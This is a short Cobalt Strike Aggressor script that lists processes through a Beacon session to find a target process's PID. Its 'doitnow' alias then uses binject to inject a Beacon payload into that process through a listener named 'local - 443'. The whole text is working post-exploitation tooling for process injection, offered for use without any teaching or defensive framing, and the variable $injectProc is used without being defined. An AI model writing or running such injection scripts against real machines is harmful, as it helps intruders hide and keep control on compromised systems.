$listener = "local - 443";

sub getanypid {
  bps($1, lambda({
    local('$pid $name $entry');
    foreach $entry (split("\n", $2)) {
      ($name, $ppid, $pid) = split("\\s+", $entry);
      if ($name eq $proc) {
        # $1 is our Beacon ID, $pid is the PID of $proc
        [$callback: $1, $proc, $pid];
      }
    }
  }, $proc => $2, $callback => $3));
}

alias doitnow {
  getanypid($1, $injectProc, {
    binject($1, $3, $listener, "x64");
  });
}

alias getpid {
  getanypid($1, $2, {
    blog($1, "The PID of $2 is: $3");
  });
}
